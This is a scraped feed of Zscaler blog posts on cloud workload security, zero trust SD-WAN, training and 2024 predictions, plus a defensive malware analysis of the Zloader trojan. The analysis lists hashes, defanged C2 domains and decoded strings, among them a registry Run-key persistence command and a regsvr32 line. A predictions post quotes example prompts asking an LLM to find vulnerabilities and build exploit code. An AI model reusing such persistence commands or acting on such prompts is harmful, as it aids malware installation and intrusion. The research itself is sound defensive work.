サーバーレス関数は大幅な簡素化を実現し、開発者は基盤となるインフラストラクチャーについて心配することなく、コードの記述と展開のみに集中できるようになります。サーバーレス関数には再利用性があり、アプリケーション開発の加速にもつながるため、マイクロサービスベースのアーキテクチャーの採用を背景として、サーバーレス関数の使用は今後も拡大していくと見られます。しかし、サーバーレス関数には重大なセキュリティ リスクが伴います。さまざまな入力やイベント ソースと連携して動作し、アクションをトリガーするには多くの場合HTTPまたはAPIの呼び出しを要するためです。また、サーバーレス関数はブロブ ストアやブロック ストレージなどのクラウド リソースを利用し、キューを展開して他の関数とのやり取りの順序を管理し、デバイスに接続します。こうしたタッチポイントの多くは信頼できないメッセージ形式を含み、標準的なアプリケーション層保護のための適切な監視や監査も行われていないため、攻撃対象領域の拡大につながります。
図:サーバーレス関数による追加のサービス全体へのアクセスが招く攻撃対象領域の拡大
3. パブリック クラウド保護に適した形でアイデンティティーベースのセキュリティ ポリシーの再定義が進む
パブリック クラウドでワークロードが急増し始めると、各CSPは独自の異なるアイデンティティー機能を導入するようになります。ユーザーの場合と異なり、Active Directoryのようにすべてを制御する強力なツールは存在しません。IT部門は、ばらばらになったワークロードのアイデンティティー プロファイルを、オンプレミス、プライベート クラウド、パブリック クラウドにわたって利用し続けることになります。セキュリティ部門は複数のワークロード属性を利用してセキュリティ ポリシーを記述し続けるため、2024年はより高レベルの抽象化(ユーザー定義タグなど)の採用が拡大し始めることが予想されます。これにより、クラウド ワークロードの領域で、サイバーセキュリティとその他のリソース管理機能(課金、アクセス制御、認証、レポート作成)の一貫性が高まっていくと見られます。
図:ゼロトラスト アーキテクチャーの導入とクラウド ワークロードの保護に活用が見込まれるユーザー定義タグ
4. 複数のパブリック クラウドをサポートするクラウド型セキュリティ プラットフォームを評価して導入する企業が増える
各パブリック クラウドの保護に特化した形で人材の配置やアーキテクチャーの構築を行うなかで、セキュリティ部門は最適なソリューションを探し出す責任を負うことになります。まずはCSPが提供するツール(クラウド ファイアウォールのポイント ソリューションなど)を検討するものの、やがてクラウド セキュリティ ポリシーの定義、適用、修復を一元化できるアーキテクチャーを求めるようになるでしょう。選択的にではなく、すべてのワークロードにサイバー防御を適用するには、一元化された1つのプラットフォームでサイバー脅威対策を提供する必要があります。
5. CIOがAWS、Azure、GCPへの依存の分散を志向し、複数のクラウドに対応したセキュリティ ツールの導入が必要になる
ベンダーに関するベスト プラクティスとして、CIOはクラウド インフラストラクチャーのポートフォリオを多様化しようとしています。こうすることで、単一のベンダーへの依存の軽減、M&Aで引き継がれたインフラストラクチャーの統合、さまざまなパブリック クラウドのサービスの良いところ取り(データ分析にはGoogle Cloud BigQuery、モバイル アプリにはAWS、ERPにはOracle Cloudなど)が可能になります。
図:クラウド リソース保護のためのAWSの責任共有フレームワーク[出典]
どのクラウド ベンダーも、サイバーセキュリティに関して「責任共有」の概念を説き、クラウド リソースのセキュリティ インフラの導入責任を顧客側に負わせています。賢明なIT部門であれば、複数のパブリック クラウド環境をサポートできるサイバーセキュリティ プラットフォームを選択するようにするはずです。パブリック クラウドごとに個別のセキュリティ ツールを使用するという発想は到底受け入れられず、すべてのニーズに対応した単一のプラットフォームへの統一という方向に向かっていくことになるでしょう。
パブリック クラウドへのワークロードの展開は、企業のトレンドとして新しいものではありませんが、クラウド ワークロード セキュリティは、今後もいっそう注目を集める話題となるでしょう。現時点ではっきりとした答えは出ていませんが、2024年に企業がどのような方向に進んでいくかについては、いくつかヒントがあります。それがゼロトラストです。速やかに短期的なメリットを得られるだけでなく、将来につながるクラウド ワークロード セキュリティの強固なフレームワークとなります。クラウド ワークロード向けのゼロトラストに関する詳細は、こちらをクリックしてご確認ください。
この記事は、アクセスとセキュリティに関する2024年のトレンドを予測するブログ シリーズの一部です。このシリーズの次回の記事では、ゼロトラストに関する予測を見ていきます。
将来の見通しに関する記述
本記事には、当社経営陣の考えや想定、現時点で同経営陣が入手可能な情報に基づいた、将来の見通しに関する記述が含まれています。「考える」、「しうる」、「するだろう」、「潜在的に」、「推定する」、「継続する」、「予想する」、「意図する」、「可能性がある」、「するとみられる」、「予測する」、「計画する」、「期待する」という文言、および将来の出来事や結果の不確実性を伝える同様の表現は、将来の見通しに関する記述である旨を意味することを目的としています。このような将来の見通しに関する記述には、2024年のサイバーセキュリティ業界の状態に関する予測、およびこのマーケットにおける機会を活用するうえでの当社の能力、サイバー脅威の防御において「as-a-serviceモデル」とゼロトラスト アーキテクチャーが持つメリットおよび市場での採用の増加に関する予測、検知と修復対応に要する時間の短縮およびサイバー脅威のプロアクティブな特定と阻止におけるAIと機械学習の能力に関する考察を含みますが、これらに限定されません。これらの将来の見通しに関する記述は、1995年米国私募証券訴訟改革法のセーフ ハーバー条項の対象となります。またこれらの将来の見通しに関する記述は、多くのリスク、不確実性、想定に左右され、多数の要因により、本ブログの作成時点でZscalerが把握していないセキュリティ リスクや開発、および2024年のサイバーセキュリティ業界に関する当社の予測の基礎となる想定を含むもののこれらに限定されない実際の結果が、本ブログの記述と大きく異なる可能性があります。
Zscalerの事業に特有のリスクと不確実性は、2022年12月7日に米国証券取引委員会(「SEC」)に提出されたフォーム10-Qの最新の四半期報告書に記載されています。本書はZscalerのWebサイト(ir.zscaler.com)またはSECのWebサイト(www.sec.gov)で確認できます。本リリースに含まれる将来の見通しに関する記述は、現時点でZscalerが入手可能な限られた情報に基づいており、今後変更される可能性があります。Zscalerは、法律で義務付けられている場合を除き、将来的に新しい情報が利用可能になった場合においても、本ブログに記載されている将来の見通しに関する記述を更新することは保証しません。
Thu, 25 1月 2024 08:00:02 -0800Sakthi Chandrahttps://www.zscaler.jp/blogs/product-insights/cloud-workloads-cybersecurity-predictions-2024Zscaler Academy: Reflecting on 2023 and Soaring into 2024
https://www.zscaler.jp/blogs/product-insights/zscaler-academy-reflecting-2023-and-soaring-2024
2023 was a year of transformation and innovation for Zscaler Academy. We reimagined cybersecurity education, tailoring it to the evolving landscape of zero trust security. As we begin 2024, it's time to reflect on what we've achieved and show you what's on the horizon
2023: Building the Pillars of Zero Trust Learning
New Training and Offerings: We revamped our curriculum, introducing the Zscaler for Users learning path and specializations in Data Protection, Cyberthreat Protection, and Workloads. Hands-on labs, live virtual training, and engaging workshops became the norm, bridging the gap between theory and practice.
New Approach: We embraced a learner-centric approach, catering to diverse learning styles and preferences. Self-paced e-learning, interactive webinars, and immersive workshops offered flexibility and depth, empowering individuals at all levels.
Certification: We evolved our certification program, aligning it with the latest zero trust advancements, and introduced an industry-standard third-party proctored certification exam. The Zscaler Digital Transformation Administrator (ZDTA) certification exam is the final step in the Zscaler for Users - Essentials learning path, and supports the journey of any security professional to validate their understanding of deploying and implementing the Zscaler Zero Trust Exchange platform.
Roadshows and Virtual Training: We took Zscaler Academy on the road, hosting virtual and in-person events like Zscaler Training Roadshows and Virtual Training workshops around the globe. These interactive sessions fostered connections, knowledge sharing, and a sense of community among Zscaler users and partners
A Year of Bridging the Cybersecurity Skills Gap
Customers: We empowered customers to maximize the value of their Zscaler investments. Our training equipped administrators, security professionals, and end users with the skills to confidently navigate the Zero Trust Exchange.
Partners: We supported our partners in their growth journey. The Partner Academy provided the knowledge and expertise needed to build successful Zscaler practices and deliver exceptional customer service.
Workforce of the Future: We invested in the future by inspiring and equipping the next generation of cybersecurity professionals. Our initiatives are contributing to closing the cybersecurity skills gap, ensuring a talent pool prepared for the zero trust era through the Zscaler Academic Alliance Program.
The New Charter Era: What Awaits in 2024
Micro-Learning and Micro-Credentials: We're embracing bite-sized learning, offering micro-credentials for specific skills. This agile approach will allow you to stay ahead of the curve and acquire targeted knowledge on the go.
New Certifications: We'll be expanding our certification portfolio, introducing new paths that validate expertise in specific Zscaler solutions and emerging security domains.
More Training Courses and Events: We'll continue to diversify our offerings, adding new training courses (like Ransomware Protection, Deception, Troubleshooting, and more), live workshops, and virtual events. Expect deeper dives into specific technologies, industry trends, and best practices.
Personalized Learning: We're committed to personalization, utilizing data and insights to tailor learning recommendations and experiences to your individual needs and goals
The Future Is Zero Trust, and Zscaler Academy Is Your Guide
As we step into 2024, Zscaler Academy remains your trusted partner on your zero trust journey. We'll continue to innovate, adapt, and empower you with the knowledge and skills to thrive in the dynamic security landscape.
Stay tuned for exciting announcements and updates! We're dedicated to making Zscaler Academy the leading destination for zero trust education, ensuring you're always prepared to secure your future in the age of zero trust.
Join us in 2024! Let's keep learning, growing, and building a safer digital world together
Wed, 24 1月 2024 08:00:01 -0800Prameet Chhabrahttps://www.zscaler.jp/blogs/product-insights/zscaler-academy-reflecting-2023-and-soaring-2024Navigating the Intersection of Cybersecurity and AI: Key Predictions for 2024
https://www.zscaler.jp/blogs/product-insights/2024-predictions
This article also appeared in VentureBeat.
Anticipating the future is a complex endeavor, however, I'm here to offer insights into potential trends that could shape the ever-evolving cybersecurity landscape in 2024. We engage with over 40% of Fortune 500 companies and I personally have conversations with thousands of CXOs each year which provides me a unique view into the possibilities that might impact the security landscape. Let's explore these potential trends and see what the future of cybersecurity might look like.
1. Generative AI will increase ransomware attacks:
The utilization of GenAI technologies will expedite the identification of vulnerable targets, enabling cybercriminals to launch ransomware attacks with greater ease and sophistication.
Before, when launching a cyberattack, hackers had to spend time to identify an organization's attack surface and potential vulnerabilities that can be exploited in internet-facing applications and services. However, with the advent of LLMs, the landscape has dramatically shifted. Now, a hacker can simply ask a straightforward question like, "Show me vulnerabilities for all firewalls for [a given organization] in a table format.” And the next command could be, “Build me exploit code for this firewall," and the task at hand becomes significantly easier.
GenAI can also help identify vulnerabilities among your supply chain partners and optimal paths that are connected to your network. It's important to recognize that even if you strengthen your own estate, vulnerabilities may still exist through other entry points, potentially making them the easiest targets for attacks.
The combination of social engineering exploits and GenAI technology will result in a surge of cyber breaches, characterized by enhanced quality, diversity, and quantity. This will create a feedback loop that facilitates iterative improvements, making these breaches even more sophisticated and challenging to mitigate.
Defense Strategy: Using the Zscaler Zero Trust Exchange, customers can make their applications invisible to potential attackers, reducing the attack surface. If you can’t be reached, you can’t be breached.
2. AI will be used to fight AI:
We will be witnessing a promising development where AI is being harnessed by security providers to combat the ever-evolving nature of AI-driven attacks.
Enterprises generate a vast amount of logs containing signals that could indicate potential attacks. However, isolating these signals in a timely manner has been challenging due to signal-to-noise issues. With the advent of GenAI technologies, we now have the capability to identify potential avenues of attack more effectively. By leveraging GenAI, we can enhance triage and protection measures by understanding which vulnerabilities hackers are likely to exploit. Additionally, this technology enables us to detect attackers and exploits in near real-time. As a result, cloud security providers will develop AI-powered tools to proactively prevent potential areas of exploitation.
In addition, with the advent of AI and ML tools, we have the capability to predict and identify potential vulnerabilities in an organization that are likely to be exploited. This will help reduce cyber breaches.
Defense Strategy: Zscaler is building tools such as breach predictors that could predict and prevent breaches powered by communication logs. Before any breach happens there is always reconnaissance activity. Because Zscaler sits in the middle of all communications, we have visibility into potential threats. This allows us to understand if a hacker has infiltrated an enterprise, and if so, suggest steps to prevent a breach.
3. The rise of firewall-free enterprises:
Organizations are coming to a realization that despite significant investments in firewalls and VPNs, their security posture remains vulnerable. They are understanding that a true Zero Trust architecture has to be implemented.
Realizing the inherent security risks and false sense of security provided by firewall-based approaches, customers will move away from Firewall and VPN as their main security technology. Over the next few years, firewalls will become archaic like mainframes.
Organizations are awakening to the need for a more comprehensive and effective cybersecurity strategy. The coming years will witness the significant acceleration in the adoption and implementation of Zero Trust architecture and the rise of "firewall-free enterprises.” This transformative shift represents a crucial inflection point in the cybersecurity landscape.
Defense Strategy: This shift reflects a changing approach to cybersecurity, driven by the understanding that a firewall-centric approach is ineffective in safeguarding against evolving threats, prompting customers to seek true Zscaler Zero Trust solutions.
4. Broader adoption of Zero Trust segmentation:
The number one cause of ransomware attacks is a flat network. Once hackers are on the network, they can easily move laterally and find high-value assets and encrypt them and ask for ransom. Organizations have been trying to implement network-based segmentation to eliminate lateral movement.
I have talked to hundreds of CISOs but have yet to meet one who has successfully completed network-based segmentation or microsegmentation. It is too cumbersome to implement and operationalize.
In 2023, hundreds of enterprises successfully implemented the initial phase of Zero Trust architecture. Moving into 2024, we anticipate a broader adoption of Zero Trust-based segmentation. This approach simplifies implementation so you don’t need to create network segments and you use Zero Trust technology to connect a certain group of applications to a certain group of applications.
Defense Strategy: Zscaler offers Zero Trust segmentation in two areas:
User-to-application segmentation
Application-to-application segmentation
5. Zero Trust SD-WAN will start to replace traditional SD-WAN:
SD-WAN has helped enterprises save money by using the internet—a cheaper transport. But SD-WANs have not improved security, as they allow lateral threat movement.
Zero Trust SD-WAN doesn’t put users on the network, it simply makes a point-to-point connection between users and applications, hence eliminating lateral threat movement. This protects enterprises from ransomware attacks. Zero Trust SD-WAN will emerge as an important technology to provide highly reliable, highly secure and seamless connectivity.
Zero Trust SD-WAN also reduces the overhead as enterprises no longer have to worry about managing route tables. Zero Trust SD-WAN makes every branch office like an internet cafe or a coffee shop, your employees can access any application without having to extend your network to every branch office.
Defense Strategy: Zscaler offers a Zero Trust SD-WAN solution that is easy to implement with a Plug-n-Play appliance.
6. SEC regulations will drive far more active participation of Board members and CFOs for cyber risk reduction:
Recognizing the damage that cyber breaches could cause to businesses, these key stakeholders will more actively engage in cybersecurity initiatives and decision-making processes.
The increased involvement of CFOs and Boards of Directors in cybersecurity underscores the recognition that it is not solely a CIO or CISO’s responsibility, but a vital element of overall organizational resilience and risk management.
Newly introduced SEC disclosure requirements will serve as a catalyst for boards to become more engaged in driving cybersecurity initiatives in their companies.
More companies will require at least one board member with a strong background in cybersecurity.
Defense Strategy: Through Zscaler Risk360, we provide a holistic risk score for an organization which highlights the contributing factors to your cyber risk and compares your risk score with your peers with trends over time. In addition, Zscaler has added SEC disclosure reports generated by GenAI, leveraging contributing factors that have been used to compute your company's risk score.
Mon, 22 1月 2024 15:31:59 -0800Jay Chaudhryhttps://www.zscaler.jp/blogs/product-insights/2024-predictionsゼロトラストの拠点への拡張
https://www.zscaler.jp/blogs/product-insights/bringing-zero-trust-branches
この5年でテクノロジー業界は大きな変革を遂げました。組織が競争力を獲得するためのテクノロジーへのアプローチにも数々の変化が起こりましたが、その中でも特に大きな影響をもたらした重要な変化が3つあります。
従来のデータ センターからクラウドへのアプリの移行(SaaSの普及)
オフィス勤務とリモート勤務の両方を組み合わせたハイブリッド ワーク モデルの普及
工場や拠点でのIoT/OTデバイスの利用拡大
今、多くの組織が、WANインフラストラクチャーの制約とネットワークのセキュリティ ギャップがこの3つの変化への対応の妨げとなっていることに気付き始めています。
従来のSD-WANは、攻撃対象領域の拡大や脅威のラテラル ムーブメントを招きます。サイト間VPNやオーバーレイ ルーティングによってさまざまなサイトを接続し、暗黙の信頼を与えることで、侵害されたエンティティーに対しても重要なビジネス リソースへの無制限のアクセスを許すことになります。さらに、低粒度のセグメンテーション ポリシーによって、脅威がネットワーク内を簡単に移動できる環境が生まれます。脅威が増加するなか、IoT/OTデバイスの導入が進んでいますが、多くの場合、こうしたデバイスの存在はネットワーク上で把握できません。そこで、組織のWANインフラストラクチャーにもゼロトラストの原則を適用することが必要です。
従来のWANインフラストラクチャーは、ルーター、ファイアウォール、VPNなどの複数のポイント製品で構成されており、管理面で大きな課題をもたらす場合があります。したがって、拠点の刷新を行う場合は、「拠点は軽く、クラウドは厚く」という発想に基づくソリューションを導入し、管理上の複雑性を軽減することが大切です。
ZscalerのゼロトラストSD-WANは、VPNの複雑性を伴うことなく、拠点、工場、データ センターを安全に接続し、ユーザー、IoT/OTデバイス、サーバーのゼロトラスト アクセスを実現します。インターネット接続のみで展開できるシンプルなプラグ&プレイ アプライアンスで、不要なデバイスを排除した軽量の拠点を構築できます。
図1:従来のSD-WANとZero Trust SD-WANの比較
Zero Trust SD-WANによるビジネス リスクの排除
リモート サイト、クラウド、サード パーティーにネットワークを拡張する従来型のSD-WANとは異なり、Zero Trust SD-WANは、ルーティングされたオーバーレイを使用せず、ユーザー、IoT/OTデバイス、アプリケーションを、それぞれがアクセス権を持つリソースに接続します。これにより、攻撃対象領域を排除し、脅威のラテラル ムーブメントを防ぐゼロトラスト ネットワークを構築できます。すべてのトラフィックはZscaler Zero Trust Exchangeでプロキシされるため、露出したIPアドレスやVPNポートを不正侵入に利用されることはありません。
最近のZscaler ThreatLabzのレポートでは、IoT/OTベースのマルウェア攻撃が2022年から400%増加していることが明らかになっており、ネットワーク上に展開されたIoT/OTデバイスの可視性とセキュリティを強化することの必要性が浮き彫りになりました。IoT/OTは、見落とされたり、存在を把握できなかったりすることが多く、管理者が拠点のユーザーのセキュリティ ポリシーを設計する際に適切な対応が取られていません。ThreatLabzのレポートが示すように、こうしたデバイスは重大な脅威ベクトルとなっています。
Zero Trust SD-WANは、デバイスを完全に可視化し、組織にすべてのIoT/OTデバイスの詳細なビューと、通信するアプリケーションに関するインサイトを提供します。さらに、同じポリシーをユーザーとデバイス両方に一貫して適用できるため、管理者はユーザーとデバイスに個別のポリシーを設定する必要がなくなります。
図2: IoTデバイスの検出と分類
多くの組織には、サーバーとクライアント間の通信のユース ケースがあります。たとえば、データ センターのプリント サーバーは、拠点にあるリモート プリンターへの印刷コマンドの発行が必要な場合があります。Zero Trust SD-WANを利用すれば、ネットワークへの侵入に悪用される可能性のあるサービス ポートの露出を懸念する必要がなくなります。拠点のすべての通信はZero Trust Exchangeでプロキシされ、プリント サーバーとリモート プリンターもこれによって接続されます。ユーザー、IoT/OTデバイス、サーバーなど、すべてのエンティティーにゼロトラスト セキュリティを拡張することで、全体のセキュリティを強化できます。
Zero Trust SD-WANによるサイト間VPNのリプレース
従来のSD-WANは、IPsec VPNトンネルを使用してサイト(拠点、工場、データ センターなど)を接続します。オーバーレイ ルーティングによって、あらゆるデバイスが他のデバイス、サーバー、アプリと通信することが可能になり、ユーザー、デバイス、アプリ間でのアクセス性が担保される一方、攻撃者もネットワーク内の他のリソースに簡単にアクセスできるようになってしまいます。
Zero Trust SD-WANでは、拠点のトラフィックをZero Trust Exchangeに直接転送し、Zscaler Internet Access (ZIA)またはZscaler Private Access (ZPA)のポリシーを適用して、完全なセキュリティ検査とアイデンティティーベースのアクセス制御を行うことができます。柔軟な転送とシンプルなポリシー管理を実現するゼロトラスト ネットワーク オーバーレイにより、拠点の通信を劇的に簡素化することが可能です。
図3:サイト間のVPNのリプレース
Zero Trust SD-WANによるM&Aの簡素化
2つの企業を1つの事業体に統合することで、効率の向上や市場でのプレゼンス強化などのメリットを得られることがあります。ただし、新しいシステムやルーティング ドメインを既存の環境に統合するプロセスには、時間と労力を要し、完了までに数か月かかる場合もあります。Zscalerのソリューションを利用することで、M&Aに伴う統合プロセス全体をはるかにシンプルかつ迅速に進めることが可能です。
Zero Trust SD-WANでは、通信先はZero Trust Exchangeのみとなるため、既存のサイトと被買収企業のサイト間でのルーティング ドメインの統合は必要ありません。被買収企業のサイトにZero Trust SD-WANを展開することで、トラフィックをZero Trust Exchangeに送り、相手側からの接続を仲介して安全な通信を行うことができます。これにより初日から円滑な運用を行い、わずか数週間、あるいは数日で新たなサイトの環境を整備することが可能です。
図4: M&Aに伴う統合
仕組み
ZPAポータルで定義されたアプリに合成IPアドレスが割り当てられます。
合成IPを使用してユーザーが新しいアプリへの接続を開始すると、その拠点のサイトのZero Trust SD-WANがZero Trust Exchangeにトラフィックを送信します。
アプリがホストされている被買収企業のサイトでは、(Zero Trust SD-WANに組み込まれた) App ConnectorがZero Trust Exchangeへ内側から外側への接続を開始します。
Zero Trust Exchangeがユーザーからアプリへの接続を仲介します。
まとめ
組織には増大する今日のサイバー脅威から身を守るためのネットワーク ソリューションが必要ですが、従来のSD-WANではセキュリティ リスクとネットワークの複雑性を高めてしています。一方、Zero Trust SD-WANはゼロトラストの原則をWANに拡張して、ユーザー、IoT/OTデバイス、サーバーを安全に接続します。拠点、工場、データ センターのセキュリティを強化するには、暗黙の信頼に基づく従来のフラットなネットワークからゼロトラスト ネットワークへの移行が必要です。Zero Trust SD-WANを導入することで、サイバー リスクの軽減、コストと複雑性の低減、ビジネス アジリティーの向上、シングルベンダーで構築するSASEソリューションの実現など、多くのメリットを得られます。
詳細はZscaler Zero Trust SD-WANのページでご確認ください。
Mon, 22 1月 2024 17:50:01 -0800Karan Dagarhttps://www.zscaler.jp/blogs/product-insights/bringing-zero-trust-branchesZloader: No Longer Silent in the Night
https://www.zscaler.jp/blogs/security-research/zloader-no-longer-silent-night
Introduction
Zloader (aka Terdot, DELoader, or Silent Night), is a modular trojan born from the leaked Zeus source code. It surfaced publicly in 2016 during a targeted campaign against German banks1, but its malicious activity traces back to at least August 2015. Zloader’s first run persisted until the beginning of 2018 when its activities abruptly ceased. Its resurgence at the end of 2019, marketed in underground forums as “Silent Night”, came with substantial alterations. The evolution of Zloader progressed steadily, leading to the development of version 2.0.0.0 around September 2021. Similar to Qakbot, the threat actors using Zloader also pivoted from conducting banking fraud to ransomware. In April 2022, security researchers executed a takedown operation2 to dismantle the botnet leading to an extended period of inactivity.
After an almost two-year hiatus, Zloader reemerged with a new iteration that appears to have started development in September 2023. These new changes include new obfuscation techniques, an updated domain generation algorithm (DGA), RSA encryption for network communications, and the loader now has native support for 64-bit versions of Windows. Initially, this new version was labeled with the old version number 2.0.0.0. However, over the past several months, they released version 2.1.6.0 and 2.1.7.0. In this blog, we will explore these new updates to Zloader.
Key Takeaways
Zloader dates back to 2015 and has been advertised in underground cybercriminal forums under the name “Silent Night” since the end of 2019.
Zloader has returned after an almost two-year hiatus after being taken down in April 2022 by security researchers.
The new version of Zloader made significant changes to the loader module, which added RSA encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time.
Zloader continues to use junk code for obfuscation, as well as API import hashing and string encryption in an attempt to hinder malware analysis.
Technical Analysis
In the following sections, we dive into the technical details surrounding Zloader’s new updates to their anti-analysis techniques, embedded configuration, DGA, and network encryption.
Anti-analysis techniques
Zloader uses a combination of API import hashing, junk code, a filename check, and string obfuscation. The following sections analyze each technique.
Imports and API resolution
The newest Zloader samples only import a few functions from the kernel32 library. The remaining imports are resolved at runtime using checksums to obfuscate the functions that are used. This technique, already present in older versions, changes its implementation, adding an XOR constant which changes between samples. Python code that replicates the API hashing algorithm is shown below.
Code sample available on GitHub.
Junk code
Similar to previous versions, Zloader uses custom obfuscation. The new version of Zloader adds junk code that consists of various arithmetic operations, as shown in Figure 1 below.
Figure 1. Example Zloader 2.1 junk code
In Figure 1, the instructions inside the red box are the junk code.
Anti-sandbox
Each Zloader sample expects to be executed with a specific filename. If the filename does not match what the sample expects, it will not execute further. This could evade malware sandboxes that rename sample files. Figure 2 shows an example of a Zloader sample that expects its filename to be CodeForge.exe.
Figure 2. Example of Zloader’s anti-analysis filename check
ThreatLabz has observed Zloader use the following filenames:
CodeForge.exe
CyberMesh.exe
EpsilonApp.exe
FusionBeacon.exe
FusionEcho.exe
IonBeacon.dll
IonPulse.exe
KineticaSurge.dll
QuantumDraw.exe
SpectraKinetic.exe
UltraApp.exe
String obfuscation
Similar to prior versions, Zloader implements a string obfuscation algorithm for some of the malware’s important strings such as registry paths, DLL names, and the DGA’s top-level domain (TLD) using XOR with a hardcoded key. Python code that replicates the string obfuscation algorithm is shown below:
Code sample available on GitHub.
The encryption key differs between samples and is also hardcoded in the .rdata section as shown in Figure 3 below.
Figure 3. Example string obfuscation key used by Zloader
A list of Zloader’s obfuscated strings is shown in the Appendix.
Static configuration encryption and structure
The Zloader static configuration is still encrypted using RC4 with a hardcoded alphanumeric key, but the structure is slightly different. The botnet ID, campaign name, and command-and-control servers (C2s) are set at fixed offsets, in addition to an RSA public key that replaces the old RC4 key that was used for network encryption. ThreatLabz has observed 15 unique new Zloader samples and all of them have the same RSA public key, likely indicating there is currently only a single threat actor using the malware.
An example Zloader static configuration is shown below.
Domain generation algorithm
When the primary C2 server is not available, Zloader reverts to a DGA. The DGA algorithm has changed in the latest version and no longer contains a different seed per botnet. Python code that replicates Zloader’s new DGA algorithm is shown below.
Code sample available on GitHub.
The code generates 32 domains per day by using the local system time at midnight (converted to UTC) as a seed. Each of the DGA domains have a length of 20 characters followed by the “.com” TLD.
Network communications
Zloader continues to use HTTP POST requests to communicate with its C2 server. However, the network encryption is now using 1,024-bit RSA with RC4 and the Zeus “visual encryption” algorithms. Zloader uses the custom Zeus BinStorage format where the first 128 bytes are the RSA encrypted RC4 key (32 random bytes) and, the remaining bytes are encrypted with the RC4 key and visual encryption as shown in Figure 4:
Figure 4. Zloader BinStorage object for a hello message (prior to encryption)
The Zeus BinStorage structure uses an ID integer value to represent the information stored, followed by the length and data. The BinStorage ID values in this example are shown in Table 1.
Value (Decimal)
Value (Hexadecimal)
Description
10002
0x2712
Botnet ID
10025
0x2729
Campaign ID
10001
0x2711
Bot ID
10003
0x2713
Malware version
10006
0x2716
Unknown flag (set to 0x1)
Table 1. Zloader BinStorage hello message fields
ThreatLabz has observed samples containing the following botnet IDs:
Bing_Mod2
Bing_Mod3
Bing_Mod4
Bing_Mod5
All of the campaign IDs have been set to the value M1.
Conclusion
Zloader was a significant threat for many years and its comeback will likely result in new ransomware attacks. The operational takedown temporarily stopped the activity, but not the threat group behind it. Returning after almost two years, Zloader has brought notable improvements to the loader module such as RSA encryption, an updated DGA, and enhanced obfuscation techniques, with more junk code, API import hashing, and string encryption to thwart malware analysis.
Zscaler ThreatLabz continues to track this threat and add detections to protect our customers.
Zscaler Coverage
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Zloader at various levels with the following threat names:
Win64.Downloader.Zloader
Indicators Of Compromise (IOCs)
SHA256
Description
038487af6226adef21a29f3d31baf3c809140fcb408191da8bc457b6721e3a55
Zloader sample
16af920dd49010cf297b03a732749bb99cc34996f090cb1e4f16285f5b69ee7d
Zloader sample
25c8f98b79cf0bfc00221a33d714fac51490d840d13ab9ba4f6751a58d55c78d
Zloader sample
2cdb78330f90b9fb20b8fb1ef9179e2d9edfbbd144d522f541083b08f84cc456
Zloader sample
83deff18d50843ee70ca9bfa8d473521fd6af885a6c925b56f63391aad3ee0f3
Zloader sample
98dccaaa3d1efd240d201446373c6de09c06781c5c71d0f01f86b7192ec42eb2
Zloader sample
adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa
Zloader sample
b206695fb128857012fe280555a32bd389502a1b47c8974f4b405ab19921ac93
Zloader sample
b47e4b62b956730815518c691fcd16c48d352fca14c711a8403308de9b7c1378
Zloader sample
d92286543a9e04b70525b72885e2983381c6f3c68c5fc64ec1e9695567fb090d
Zloader sample
eb4b412b4fc58ce2f134cac7ec30bd5694a3093939d129935fe5c65f27ce9499
Zloader sample
f03b9dce7b701d874ba95293c9274782fceb85d55b276fd28a67b9e419114fdb
Zloader sample
f6d8306522f26544cd8f73c649e03cce0268466be27fe6cc45c67cc1a4bdc1b8
Zloader sample
fa4b2019d7bf5560b88ae9ab3b3deb96162037c2ed8b9e17ea008b0c97611616
Zloader sample
fbd60fffb5d161e051daa3e7d65c0ad5f589687e92e43329c5c4c950f58fbb75
Zloader sample
URL
Description
https://adslstickerhi[.]world
Zloader C2
https://adslstickerni[.]world
Zloader C2
https://dem.businessdeep[.]com
Zloader C2
Appendix
Tools
The code snippets in this blog have also been uploaded to our GitHub tools repository here.
Decoded strings
user32.dll
nbsp;
%s
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v %s /d "%s"
wininet.dll
td
tr
br
Software\Microsoft\
h3
Local\
hr
POST
gdiplus.dll
NtWriteVirtualMemory
https://
*
\??\
ntdll.dll
ws2_32.dll
_alldiv
NtProtectVirtualMemory
NtGetContextThread
shell32.dll
%s %s
psapi.dll
crypt32.dll
S-1-15
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
_aulldiv
\"%s\"
samlib.dll
S:(ML;CIOI;NRNWNX;;;LW)
NtCreateThreadEx
regsvr32.exe /s \"%s\"
NtResumeThread
bcrypt.dll
netapi32.dll
RtlGetVersion
strtoul
winsta.dll
wldap32.dll
NtReadVirtualMemory
Basic
0:0
version.dll
h2
InstallDate
h5
NtAllocateVirtualMemory
.com
cabinet.dll
S:(ML;;NRNWNX;;;LW)
li
kernel32.dll
%s\tmp_%08x
h6
aeiouy
div
rpcrt4.dll
{%08X-%04X-%04X-%08X%08X}
iphlpapi.dll
mpr.dll
C:\Windows\System32\ntdll.dll
Connection: close
gdi32.dll
C:\Windows\System32\msiexec.exe
Global\
wtsapi32.dll
NtCreateUserProcess
shlwapi.dll
RtlUserThreadStart
%s
NtOpenProcess
HTTP/1.1
ncrypt.dll
INVALID_BOT_ID
_aullrem
Software\Microsoft\Windows\CurrentVersion\Run
dnsapi.dll
ole32.dll
.dll
C:\Windows\SysWOW64\msiexec.exe
bcdfghklmnpqrstvwxz
ftllib.dll
User metrics
ThreadStart
MSIMG32.dll
\*
JKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
h1
NtSetContextThread
*/*
GET
userenv.dll
urlmon.dll
Software\Microsoft\Windows NT\CurrentVersion
_ThreadStart@4
dxgi.dll
NtOpenSection
script
/post.php
advapi32.dll
h4
secur32.dll
imagehlp.dll
%s_%s_%X
winscard.dll
References
1 The Curious Case of an Unknown Trojan Targeting German-Speaking Users
2 Dismantling ZLoader: How malicious ads led to disabled security tools and ransomware | Microsoft Security Blog
Fri, 19 1月 2024 15:41:37 -0800Santiago Vicentehttps://www.zscaler.jp/blogs/security-research/zloader-no-longer-silent-nightZero Trust SASEの発表
https://www.zscaler.jp/blogs/product-insights/introducing-zero-trust-sase
働き方とITの進化
